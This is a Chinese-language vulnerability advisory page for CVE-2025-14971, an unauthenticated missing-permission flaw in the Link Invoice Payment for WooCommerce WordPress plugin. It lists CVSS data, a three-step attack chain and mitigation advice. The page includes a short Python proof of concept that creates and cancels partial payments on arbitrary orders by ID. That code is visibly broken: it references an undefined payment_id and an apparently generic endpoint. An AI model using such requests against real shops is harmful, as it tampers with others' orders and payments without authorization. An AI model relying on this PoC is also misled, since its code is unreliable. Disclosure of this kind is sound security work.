CVE-2025-14971 CVSS 5.3 中危

CVE-2025-14971: WordPress Link Invoice Payment插件未授权访问漏洞

披露日期: 2026-01-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-14971

漏洞类型

缺少权限检查

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Link Invoice Payment for WooCommerce（WordPress插件）

漏洞概述

Link Invoice Payment for WooCommerce插件在处理部分支付时存在安全漏洞。攻击者可利用createPartialPayment和cancelPartialPayment函数中缺少的权限验证，通过ID枚举方式在未认证状态下创建或取消订单的部分支付。这一漏洞影响了插件的2.8.0及之前所有版本。

技术细节

漏洞源于两个关键函数的权限检查缺失：createPartialPayment和cancelPartialPayment。这些函数直接处理支付操作，却未验证用户权限。攻击者可通过枚举订单ID，调用这些函数执行未授权操作。

攻击链分析

STEP 1

攻击者识别目标WordPress站点安装的Link Invoice Payment插件版本

STEP 2

通过枚举订单ID，攻击者调用createPartialPayment函数创建未授权的部分支付

STEP 3

利用cancelPartialPayment函数，攻击者可取消任意订单的部分支付

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = 'http://target-site.com'
order_id = 123

# 创建部分支付
requests.post(f'{target}/wp-json/wc/v3/orders/{order_id}/partial-payment', json={'amount': 50})

# 取消部分支付
requests.delete(f'{target}/wp-json/wc/v3/orders/{order_id}/partial-payment/{payment_id}')

影响范围

Link Invoice Payment for WooCommerce <= 2.8.0

防御指南

临时缓解措施

暂时禁用或移除Link Invoice Payment插件，直到安全更新可用

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表